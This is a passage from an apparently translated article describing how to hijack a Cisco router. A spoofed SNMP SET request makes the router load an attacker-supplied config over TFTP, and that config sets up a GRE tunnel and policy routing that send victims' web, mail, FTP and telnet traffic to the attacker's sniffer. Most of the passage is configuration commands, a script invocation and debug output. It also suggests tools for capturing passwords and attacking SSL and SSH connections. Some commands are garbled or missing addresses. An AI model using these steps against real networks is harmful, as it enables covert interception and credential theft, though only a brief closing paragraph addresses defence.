We need to create a GRE tunnel on the attacked router. Since we don't have access to a terminal (console), we can simply edit the resulting configuration file and then send it back to the router using a fake SNMP SET request. Let's add the following lines to the configuration file of the attacked router: interface tunnel0 ip address 192.168.10.1 255.255.255.0 tunnel source Ethernet0/0 tunnel destination tunnel mode gre ip They mean the following:- We created an interface tunnel0 and specified an IP address from the network 192.168.10.x. To exchange data, both ends of the tunnel must be on the same subnet.
- We have indicated that the Ethernet0/0 interface is the start of the tunnel (otherwise, where would the tunnel start from?)
- The end of the tunnel is the IP address of the external interface of the hacker's router.
- The last command is not required, since by default it is the GRE tunnel that is created anyway (but we still added it to be more sure).
To do this, add a few more lines to the configuration file of the attacked router:
Access-list 101 permit tcp any any eq 443 access-list 101 permit tcp any any eq 80 access-list 101 permit tcp any any eq 21 access-list 101 permit tcp any any eq 20 access-list 101 permit tcp any any eq 23 access-list 101 permit tcp any any eq 25 access-list 101 permit tcp any any eq 110 We have allowed data transfer via SSL, HTTP, FTP, telnet, SMTP and POP3 protocols.
Now, if the traffic matches the rules described above, it will be redirected in accordance with the routing maps, the description of which must be added to the configuration file:
Router-map divert-traffic match ip address 101 set ip next-hop 192.168.10.2 interface Ethernet0/0 ip policy route-map divert-traffic This entry has the following meaning:
- We defined the routing map name (divert-traffic) and then used the 'match' command to specify that the match condition should be access rule set 101 (access-list).
- We specified the attacker's IP address as the next-hop address.
- We applied a routing map to the external LAN interface of the attacked machine. The result of this will be to monitor all incoming and outgoing Ethernet0/0 traffic.
Hacker's router
The configuration of the attacker's router is a little more complicated, since we must define two routing maps - one to forward traffic to the attacker's computer (sniffer), and another to send traffic back to the attacked router. It is very important that we send the tunneled data back to the attacked router so that the attacked computer (Victim Client) does not lose connection.
Let's start by creating a GRE tunnel on the attacker's router: Attacker(config)# interface tunnel0 Attacker(config-if)# ip address 192.168.10.2 255.255.255.0 Attacker(config-if)# tunnel source Ethernet0/0 Attacker(config-if)# tunnel destination Attacker(config-if)# tunnel mode gre ip Attacker(config)# access-list 101 permit ip any any Attacker(config)# router-map divert-to-sniffer Attacker(config-route-map)# match ip address 101 Attacker(config-route-map)# set ip next-hop 192.168.3.5 Attacker(config-route-map)# exit Attacker(config)# interface tunnel0 Attacker(config-if)# ip policy route-map divert- to-sniffer These rules mean the following:
- We created an access rule that allows all types of traffic.
- We have created a divert-to-sniffer routing map (this routing map will redirect tunneled traffic to the sniffer).
- The created access rule is used as a match condition.
- We specified the IP address of the attacker (sniffer) as the next-hop address.
- We have applied the routing map to the tunnel0 interface.
Finally, let's create a routing map and associate it with the Ethernet0/0 interface:
Attacker(config-if)# route-map divert-out Attacker(config-route-map)# match ip address 101 Attacker(config-route-map)# set ip next-hop 192.168.10.1 Attacker(config-route-map )# exit Attacker(config)# interface ethernet0/0 Attacker(config-if)# ip policy route-map divert-out These additional settings mean the following:
- After the attacker (sniffer) intercepts and forwards the tunneled data back, the divert-out routing map will redirect the traffic back to the attacked router.
- We applied the routing map to the Ethernet interface.
Attacker (sniffer)
After completing the configuration of the routers, we need to configure the attacker's computer (sniffer) to intercept and redirect data. It is important that the computer is configured to forward packets back. To do this, you can use one of the following commands: root@whax:~# echo 1 > /proc/sys/net/ipv4/ip_forward or root@whax:~# fragrouter -B1 Without redirection, our attack will cause a denial of service (DoS) on computer being attacked and, accordingly, will lose its meaning.Let's start the attack
After all the settings are completed, all we have to do is upload a new modified configuration file to the attacked router. The result will be the activation of the GRE tunnel and the redirection of all traffic from the local network of the attacked computer to the hacker (sniffer).We need to create a fake SNMP SET request, which will cause the router to download a new configuration file and add it to current configuration. In order to get the base package we will send the usual request again:
Root@whax# ./merge-router-config.pl ##################################### ################# # Merge Cisco Router config - Using SNMP # Hacked up by muts - [email protected]################################################## ##### Usage: ./merge-copy-config.pl Make sure a TFTP server is set up, preferably running from /tmp ! root@whax# Let's intercept this packet and change the return IP address and some other fields in the packet header, as shown in Figure 5.
Figure 5. Changing the packet header.
After sending the modified packet, a TFTP connection will be created with our computer (Figure 6).
Figure 6. Connection to the attacker's TFTP server.
Pay attention to the TFTP read request (packet #2). The packet bypasses SNMP access rules, causing a new modified configuration file to be downloaded and added to the current configuration. Debugging information from the attacked router reveals a lot of interesting information about the progress of the attack:
*Mar 1 00:32:53.854: SNMP: Set request, reqid 36323, errstat 0, erridx 0 ccCopyTable.1.2.12285992 = 1 ccCopyTable.1.3.12285992 = 4 ccCopyTable.1.4.12285992 = 1 ccCopyTable.1.5.1 2285992 = 80.179 .76.227 (the address of the TFTP server) ccCopyTable.1.6.12285992 = pwnd-router.config ccCopyTable.1.14.12285992 = 4 *Mar 1 00:32:53.971: SNMP: Response, reqid 36323, errstat 0, erridx 0 ccCopyTable .1.2.12285992 = 1 ccCopyTable.1.3.12285992 = 4 ccCopyTable.1.4.12285992 = 1 ccCopyTable.1.5.12285992 = 80.179.76.227 (the address of the TFTP server ccCopyTable.1.6.1228599) 2 = pwnd-router.config ccCopyTable. 1.14.12285992 = 4 *Mar 1 00:32:54.291: SNMP: Packet sent via UDP to 192.168.1.5 Note that the TFTP server address differs from the attacker’s IP address and is sent as a separate parameter. The tunnel is now open and ready for use and can be diagrammed in Figure 7.
Figure 7. GRE tunnel.
You can check the functionality of the tunnel by sending a debugging command to the attacker’s router:
Attacker# debug tunnel *Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0 *Mar 3 06:38: Tunnel0: GRE/IP to classify 212.199.145.242 ->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0) *Mar 3 06:38: Tunnel0: adjacency fixup, 80.179.20.55 -> 212.199.145.242, tos=0x0g all Suppose the attacked computer searched for the term “GRE Sniffing” on Google, as shown in Figure 8.
Figure 8. The victim is looking for information about GRE tunnels.
As a result of these actions, Ethereal on the attacker's computer will receive the packets shown in Figure 9.
Figure 9. Sniffer shows a Google query to search for information about GRE tunnels.
In addition to using a specialized sniffer (such as dsniff) to intercept plaintext passwords, we can carry out sophisticated man-in-the-middle attacks on the victim's computer. Ettercap good utility, allowing, in addition to interception different types passwords, organize a man-in-the-middle attack on encrypted SSL protocols and SSH. Ettercap filters can be used to control and modify the traffic that passes through. The possibilities are virtually endless.
Conclusion
Sometimes some things are not what they seem. When dealing with SNMP (or other UDP-based protocols), you always need to be aware of the nooks and crannies that, if overlooked, could cause your network to be compromised.In the example described, an additional access rule that explicitly defines the address of the TFTP server (located on the router we attacked) would be enough to thwart the attack.
Skeptics may ask “How did the attacker know about the SNMP group RW access/name rules?” This information can be obtained by brute force, not only group names, but also allowed IP addresses, and such a utility already exists.
The purpose of the article was to show not so much the effectiveness of the described attack, but the potential gaps in UDP-based protocols. This in no way means that Cisco equipment is unsafe. Proper configuration should minimize the chances of bypassing the protection. Errors of network administrators are the main reasons for compromise of Cisco equipment.
Information about hardening Cisco routers can be found at